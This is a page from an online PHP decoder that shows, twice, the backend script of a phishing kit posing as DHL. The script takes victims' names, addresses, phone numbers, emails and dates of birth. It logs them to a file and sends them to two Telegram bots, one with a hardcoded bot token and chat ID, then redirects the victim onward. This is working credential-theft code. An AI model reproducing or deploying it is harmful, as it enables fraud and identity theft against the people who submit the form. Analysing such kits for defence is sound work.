Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php session_start(); error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); @in..

Decoded Output download

<?php 
session_start(); 
 
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); 
@ini_set('html_errors', '0'); 
@ini_set('display_errors', '0'); 
@ini_set('display_startup_errors', '0'); 
@ini_set('log_errors', '0'); 
 
include('../LBRAD/911.php'); 
include('../LBRAD/COUNTRY.php'); 
include('../LBRAD/SYS.php'); 
include('../LBRAD/TELEGRMAT.php'); 
 
if (isset($_POST['submit'])) { 
    $message = "* +------+INFO-DHL+------+
"; 
	 
    $message .= "* Full-Name: " . $_POST['full'] . "
"; 
    $message .= "* A-ddress: " . $_POST['adress'] . "
"; 
    $message .= "* C-ity: " . $_POST['city'] . "
"; 
    $message .= "* Zip-code: " . $_POST['zip'] . "
"; 
    $message .= "* Phone-Number: " . $_POST['phone'] . "
"; 
    $message .= "* E-mail: " . $_POST['email'] . "
"; 
    $message .= "* Date of Birth: " . $_POST['dob'] . "
"; // Assuming 'dob' is the name attribute in your form for the date of birth field 
 
 
    $message .= "* +------+INFO+------+
"; 
    $message .= "* Country: #$get_user_country
"; 
    $message .= "* IP Address: $ip
"; 
    $message .= "* Time: $date
"; 
    $message .= "* +------++------+
"; 
 
    $file = fopen('XD.txt', 'a'); 
    fwrite($file, $message . "
"); 
    fclose($file); 
 
    $data = [ 
        'text' => $message, 
        'chat_id' => $chat_id, 
    ]; 
 
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data)); 
 
    // Add the second bot's information 
    $token_2 = "6836504745:AAHImp_B4SMLtyto8ZcoDcqpXgYxLfzbj4A"; 
    $chat_id_2 = "-4199090169"; 
 
    $data_2 = [ 
        'text' => $message, 
        'chat_id' => $chat_id_2, 
    ]; 
 
    file_get_contents("https://api.telegram.org/bot$token_2/sendMessage?" . http_build_query($data_2)); 
 
    header('Location: ../B.php?cred=1#sHFHJHDHDHKJDJDSDSJDSJKJDSJDSDJJDSHYKJHGFG'); 
    exit; 
} 
?> 

Did this file decode correctly?

Original Code

<?php
session_start();

error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
@ini_set('html_errors', '0');
@ini_set('display_errors', '0');
@ini_set('display_startup_errors', '0');
@ini_set('log_errors', '0');

include('../LBRAD/911.php');
include('../LBRAD/COUNTRY.php');
include('../LBRAD/SYS.php');
include('../LBRAD/TELEGRMAT.php');

if (isset($_POST['submit'])) {
    $message = "* +------+INFO-DHL+------+\n";
	
    $message .= "* Full-Name: " . $_POST['full'] . "\n";
    $message .= "* A-ddress: " . $_POST['adress'] . "\n";
    $message .= "* C-ity: " . $_POST['city'] . "\n";
    $message .= "* Zip-code: " . $_POST['zip'] . "\n";
    $message .= "* Phone-Number: " . $_POST['phone'] . "\n";
    $message .= "* E-mail: " . $_POST['email'] . "\n";
    $message .= "* Date of Birth: " . $_POST['dob'] . "\n"; // Assuming 'dob' is the name attribute in your form for the date of birth field


    $message .= "* +------+INFO+------+\n";
    $message .= "* Country: #$get_user_country\n";
    $message .= "* IP Address: $ip\n";
    $message .= "* Time: $date\n";
    $message .= "* +------++------+\n";

    $file = fopen('XD.txt', 'a');
    fwrite($file, $message . "\n");
    fclose($file);

    $data = [
        'text' => $message,
        'chat_id' => $chat_id,
    ];

    file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data));

    // Add the second bot's information
    $token_2 = "6836504745:AAHImp_B4SMLtyto8ZcoDcqpXgYxLfzbj4A";
    $chat_id_2 = "-4199090169";

    $data_2 = [
        'text' => $message,
        'chat_id' => $chat_id_2,
    ];

    file_get_contents("https://api.telegram.org/bot$token_2/sendMessage?" . http_build_query($data_2));

    header('Location: ../B.php?cred=1#sHFHJHDHDHKJDJDSDSJDSJKJDSJDSDJJDSHYKJHGFG');
    exit;
}
?>

Function Calls

None

Variables

None

Stats

MD5 f88ecb34dd8331f6bbe85bc5b8f2114f
Eval Count 0
Decode Time 65 ms